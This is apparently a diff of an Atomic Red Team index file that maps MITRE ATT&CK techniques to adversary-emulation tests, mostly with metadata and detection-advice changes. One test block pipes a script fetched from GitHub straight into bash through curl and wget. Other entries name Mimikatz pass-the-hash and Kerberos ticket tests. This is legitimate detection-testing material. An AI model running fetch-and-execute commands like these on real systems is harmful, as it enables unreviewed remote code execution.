+ - name: Create and Execute Bash Shell Script
+ auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
+ description: 'Creates and executes a simple bash script.
+
+'
+ supported_platforms:
+ - macos
+ - linux
+ input_arguments:
+ script_path:
+ description: Script path
+ type: path
+ default: "/tmp/art.sh"
+ executor:
+ command: |
+ sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
+ sh -c "echo 'ping -c 4 8.8.8.8' >> #{script_path}"
+ chmod +x #{script_path}
+ sh #{script_path}
+ cleanup_command: 'rm #{script_path}
+
+'
+ name: sh
+ - name: Command-Line Interface
+ auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c
+ description: |
+ Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.
+
+ Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
+ supported_platforms:
+ - macos
+ - linux
+ executor:
+ command: |
+ curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
+ wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
+ cleanup_command: 'rm /tmp/art-fish.txt
+
+'
+ name: sh
+ T1204:
+ technique:
created: '2018-04-18T17:59:24.739Z'
+ modified: '2020-03-11T14:55:56.315Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1204
+ url: https://attack.mitre.org/techniques/T1204
+ description: |-
+ An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
+
+ While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
+ name: User Execution
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5
x_mitre_version: '1.2'
x_mitre_data_sources:
- Anti-virus
@@ -41007,41 +42408,57 @@ execution:
atomic_tests: []
T1059.005:
technique:
+ id: attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67
+ description: |-
+ Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
+
+ Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Office applications.(Citation: Microsoft VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)
+
+ Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.
+ name: Visual Basic
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1059.005
url: https://attack.mitre.org/techniques/T1059/005
+ - source_name: VB .NET Mar 2020
+ url: https://devblogs.microsoft.com/vbteam/visual-basic-support-planned-for-net-5-0/
+ description: ".NET Team. (2020, March 11). Visual Basic support planned for
+ .NET 5.0. Retrieved June 23, 2020."
+ - source_name: VB Microsoft
+ url: https://docs.microsoft.com/dotnet/visual-basic/
+ description: Microsoft. (n.d.). Visual Basic documentation. Retrieved June
+ 23, 2020.
+ - source_name: Microsoft VBA
+ url: https://docs.microsoft.com/office/vba/api/overview/
+ description: Microsoft. (2019, June 11). Office VBA Reference. Retrieved June
+ 23, 2020.
- source_name: Microsoft VBScript
url: https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85)
description: Microsoft. (2011, April 19). What Is VBScript?. Retrieved March
28, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: VBScript
- description: |-
- Adversaries may abuse VBScript scripts for execution. VBScript is a Windows scripting language modeled after the Visual Basic language, also known as Visual Basic for Applications (VBA).(Citation: Microsoft VBScript) VBScript is built on top of the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM), which allows it to interact with the environment. VBScript can also be used in place of JavaScript on webpages served to Internet Explorer, however, most modern browsers do not come with VBScript support.
-
- In a command-line environment, Cscript.exe is used to execute scripts. If a GUI is desired, Wscript.exe is used.
-
- Adversaries may abuse VBScript to execute malicious command and payloads. A common usage is embedding VBScript content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.
- id: attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-03-28T17:34:02.708Z'
+ modified: '2020-06-25T03:32:51.046Z'
created: '2020-03-09T14:29:51.508Z'
x_mitre_platforms:
- Windows
+ - macOS
+ - Linux
x_mitre_data_sources:
- - Windows event logs
+ - DLL monitoring
+ - Loaded DLLs
+ - File monitoring
- Process monitoring
- Process command-line parameters
x_mitre_detection: |-
- Monitor for usage of Cscript.exe or Wscript.exe. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+ Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving VB payloads or scripts, or loading of modules associated with VB languages (ex: vbscript.dll). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programable post-compromise behaviors and could be used as indicators of detection leading back to the source.
- Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
+ Understanding standard usage patterns is important to avoid a high number of false positives. If VB execution is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If VB execution is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Payloads and scripts should be captured from the file system when possible to determine their actions and intent.
x_mitre_permissions_required:
- User
- Administrator
@@ -41051,7 +42468,20 @@ execution:
atomic_tests: []
T1059.003:
technique:
- id: attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62
+ created: '2020-03-09T14:12:31.196Z'
+ modified: '2020-03-28T17:02:13.722Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ type: attack-pattern
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1059.003
+ url: https://attack.mitre.org/techniques/T1059/003
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Windows Command Shell
description: "Adversaries may abuse the Windows command shell for execution.
The Windows command shell (cmd.exe) is the primary command prompt
on Windows systems. The Windows command prompt can be used to control almost
@@ -41064,20 +42494,7 @@ execution:
commands and payloads. Common uses include cmd.exe /c to execute
a single command, or abusing cmd.exe interactively with input
and output forwarded over a command and control channel."
- name: Windows Command Shell
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1059.003
- url: https://attack.mitre.org/techniques/T1059/003
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
- modified: '2020-03-28T17:02:13.722Z'
- created: '2020-03-09T14:12:31.196Z'
+ id: attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62
x_mitre_version: '1.0'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
@@ -41134,7 +42551,7 @@ execution:
description: |-
Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)
- An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI 2015)
+ An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)
external_references:
- source_name: mitre-attack
external_id: T1047
@@ -41151,6 +42568,10 @@ execution:
description: Microsoft. (n.d.). Windows Management Instrumentation. Retrieved
April 27, 2016.
source_name: MSDN WMI
+ - source_name: FireEye WMI SANS 2015
+ url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf
+ description: Devon Kerr. (2015). There's Something About WMI. Retrieved May
+ 4, 2020.
- url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
description: Ballenthin, W., et al. (2015). Windows Management Instrumentation
(WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.
@@ -41161,31 +42582,31 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-03-09T14:52:26.618Z'
+ modified: '2020-05-13T22:50:51.258Z'
created: '2017-05-31T21:30:44.329Z'
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - Authentication logs
- - Netflow/Enclave netflow
- - Process monitoring
- - Process command-line parameters
- x_mitre_detection: 'Monitor network traffic for WMI connections; the use of
- WMI in environments that do not typically use WMI may be suspect. Perform
- process monitoring to capture command-line arguments of "wmic" and detect
- commands that are used to perform remote behavior. (Citation: FireEye WMI
- 2015)'
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_remote_support: true
- x_mitre_platforms:
- - Windows
x_mitre_system_requirements:
- |-
WMI service, winmgmt, running.
Host/network firewalls allowing SMB and WMI ports from source to destination.
SMB authentication.
+ x_mitre_platforms:
+ - Windows
+ x_mitre_remote_support: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: 'Monitor network traffic for WMI connections; the use of
+ WMI in environments that do not typically use WMI may be suspect. Perform
+ process monitoring to capture command-line arguments of "wmic" and detect
+ commands that are used to perform remote behavior. (Citation: FireEye WMI
+ 2015)'
+ x_mitre_data_sources:
+ - Authentication logs
+ - Netflow/Enclave netflow
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.1'
+ x_mitre_is_subtechnique: false
identifier: T1047
atomic_tests:
- name: WMI Reconnaissance Users
@@ -41340,23 +42761,23 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-03-23T20:24:52.899Z'
created: '2020-01-30T17:37:22.261Z'
- x_mitre_platforms:
- - Office 365
- - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_defense_bypassed:
+ - System Access Controls
+ x_mitre_detection: Monitor access token activity for abnormal use and permissions
+ granted to unusual or suspicious applications and APIs.
+ x_mitre_data_sources:
+ - Office 365 audit logs
+ - OAuth audit logs
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
- Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)
- Mark Wee
- x_mitre_data_sources:
- - Office 365 audit logs
- - OAuth audit logs
- x_mitre_detection: Monitor access token activity for abnormal use and permissions
- granted to unusual or suspicious applications and APIs.
- x_mitre_defense_bypassed:
- - System Access Controls
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Office 365
+ - SaaS
atomic_tests: []
T1175:
technique:
@@ -41459,20 +42880,8 @@ lateral-movement:
phase_name: execution
modified: '2020-03-30T13:36:10.069Z'
created: '2018-01-16T16:13:52.465Z'
- x_mitre_is_subtechnique: false
- x_mitre_remote_support: true
- x_mitre_platforms:
- - Windows
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - User
- x_mitre_detection: |-
- Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1086), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)
-
- Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.
-
- Monitor for any influxes or abnormal increases in Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic.
+ x_mitre_deprecated: true
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- PowerShell logs
- API monitoring
@@ -41482,24 +42891,29 @@ lateral-movement:
- Process monitoring
- Windows Registry
- Windows event logs
- x_mitre_version: '2.0'
- x_mitre_deprecated: true
+ x_mitre_detection: |-
+ Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1086), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)
+
+ Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.
+
+ Monitor for any influxes or abnormal increases in Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic.
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - User
+ x_mitre_platforms:
+ - Windows
+ x_mitre_remote_support: true
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1021.003:
technique:
- id: attack-pattern--68a0c5ed-bee2-4513-830d-5b0d650139bd
- description: |-
- Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.
-
- The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)
-
- Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)
-
- Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.
- name: Distributed Component Object Model
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2020-02-11T18:26:36.444Z'
+ modified: '2020-03-23T20:21:03.684Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: lateral-movement
+ type: attack-pattern
external_references:
- source_name: mitre-attack
external_id: T1021.003
@@ -41540,12 +42954,19 @@ lateral-movement:
description: Tsukerman, P. (2017, November 8). Leveraging Excel DDE for lateral
movement via DCOM. Retrieved November 21, 2017.
source_name: Cyberreason DCOM DDE Lateral Movement Nov 2017
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: lateral-movement
- modified: '2020-03-23T20:21:03.684Z'
- created: '2020-02-11T18:26:36.444Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Distributed Component Object Model
+ description: |-
+ Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.
+
+ The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)
+
+ Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)
+
+ Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.
+ id: attack-pattern--68a0c5ed-bee2-4513-830d-5b0d650139bd
x_mitre_data_sources:
- Windows event logs
- Windows Registry
@@ -41569,17 +42990,14 @@ lateral-movement:
atomic_tests: []
T1210:
technique:
- id: attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Exploitation of Remote Services
- description: |-
- Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
-
- An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.
-
- There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services. (Citation: NVD CVE-2014-7169)
-
- Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.
+ created: '2018-04-18T17:59:24.739Z'
+ modified: '2020-02-04T20:14:11.064Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: lateral-movement
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1210
@@ -41600,14 +43018,17 @@ lateral-movement:
description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
Detail. Retrieved April 3, 2018.
source_name: NVD CVE-2014-7169
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: lateral-movement
- modified: '2020-02-04T20:14:11.064Z'
- created: '2018-04-18T17:59:24.739Z'
+ description: |-
+ Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
+
+ An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.
+
+ There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services. (Citation: NVD CVE-2014-7169)
+
+ Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.
+ name: Exploitation of Remote Services
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82
x_mitre_version: '1.1'
x_mitre_detection: Detecting software exploitation may be difficult depending
on the tools available. Software exploits may not always succeed or may cause
@@ -41639,7 +43060,7 @@ lateral-movement:
description: |-
Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017)
- Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) or [Spearphishing Link](https://attack.mitre.org/techniques/T1192) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces.
+ Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces.
There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)
name: Internal Spearphishing
@@ -41662,26 +43083,9 @@ lateral-movement:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- modified: '2019-10-22T21:37:05.004Z'
+ modified: '2020-03-31T22:13:33.718Z'
created: '2019-09-04T19:26:12.441Z'
- x_mitre_version: '1.0'
- x_mitre_permissions_required:
- - User
- x_mitre_detection: 'Network intrusion detection systems and email gateways usually
- do not scan internal email, but an organization can leverage the journaling-based
- solution which sends a copy of emails to a security service for offline analysis
- or incorporate service-integrated solutions using on-premise or API-based
- integrations to help detect internal spearphishing attacks.(Citation: Trend
- Micro When Phishing Starts from the Inside 2017)'
- x_mitre_contributors:
- - Tim MalcomVetter
- - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- - Office 365
- - SaaS
+ x_mitre_is_subtechnique: false
x_mitre_data_sources:
- SSL/TLS inspection
- DNS records
@@ -41690,6 +43094,24 @@ lateral-movement:
- File monitoring
- Mail server
- Office 365 trace logs
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ - Office 365
+ - SaaS
+ x_mitre_contributors:
+ - Tim MalcomVetter
+ - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_detection: 'Network intrusion detection systems and email gateways usually
+ do not scan internal email, but an organization can leverage the journaling-based
+ solution which sends a copy of emails to a security service for offline analysis
+ or incorporate service-integrated solutions using on-premise or API-based
+ integrations to help detect internal spearphishing attacks.(Citation: Trend
+ Micro When Phishing Starts from the Inside 2017)'
+ x_mitre_permissions_required:
+ - User
+ x_mitre_version: '1.0'
atomic_tests: []
T1570:
technique:
@@ -41717,10 +43139,16 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-03-23T22:10:10.862Z'
created: '2020-03-11T21:01:00.959Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: 'Monitor for file creation and files transferred within a
+ network using protocols such as SMB. Unusual processes with internal network
+ connections creating files on-system may be suspicious. Consider monitoring
+ for abnormal usage of utilities and command-line arguments that may be used
+ in support of remote transfer of files. Considering monitoring for alike file
+ hashes or characteristics (ex: filename) that are created on multiple hosts.'
x_mitre_data_sources:
- Process command-line parameters
- File monitoring
@@ -41729,16 +43157,10 @@ lateral-movement:
- Netflow/Enclave netflow
- Network protocol analysis
- Process monitoring
- x_mitre_detection: 'Monitor for file creation and files transferred within a
- network using protocols such as SMB. Unusual processes with internal network
- connections creating files on-system may be suspicious. Consider monitoring
- for abnormal usage of utilities and command-line arguments that may be used
- in support of remote transfer of files. Considering monitoring for alike file
- hashes or characteristics (ex: filename) that are created on multiple hosts.'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1550.002:
technique:
@@ -41771,21 +43193,21 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-03-23T16:24:34.766Z'
created: '2020-01-30T16:36:51.184Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Travis Smith, Tripwire
- x_mitre_data_sources:
- - Authentication logs
+ x_mitre_defense_bypassed:
+ - System Access Controls
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: Audit all logon and credential use events and review for
discrepancies. Unusual remote logins that correlate with other suspicious
activity (such as writing and executing binaries) may indicate malicious activity.
NTLM LogonType 3 authentications that are not associated to a domain login
and are not anonymous logins are suspicious.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - System Access Controls
+ x_mitre_data_sources:
+ - Authentication logs
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ x_mitre_platforms:
+ - Windows
identifier: T1550.002
atomic_tests:
- name: Mimikatz Pass the Hash
@@ -41899,23 +43321,23 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-03-12T17:03:16.122Z'
created: '2020-01-30T17:03:43.072Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Vincent Le Toux
- - Ryan Becwar
- x_mitre_data_sources:
- - Authentication logs
+ x_mitre_defense_bypassed:
+ - System Access Controls
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - Kerberos authentication enabled
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
Event ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to "Integrity check on decrypted field failed" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection)
- x_mitre_system_requirements:
- - Kerberos authentication enabled
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - System Access Controls
+ x_mitre_data_sources:
+ - Authentication logs
+ x_mitre_contributors:
+ - Vincent Le Toux
+ - Ryan Becwar
+ x_mitre_platforms:
+ - Windows
identifier: T1550.003
atomic_tests:
- name: Mimikatz Kerberos Ticket Attack
@@ -41977,20 +43399,20 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-03-23T23:24:39.182Z'
created: '2020-02-25T18:35:42.765Z'
- x_mitre_platforms:
- - Windows
- x_mitre_permissions_required:
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: |-
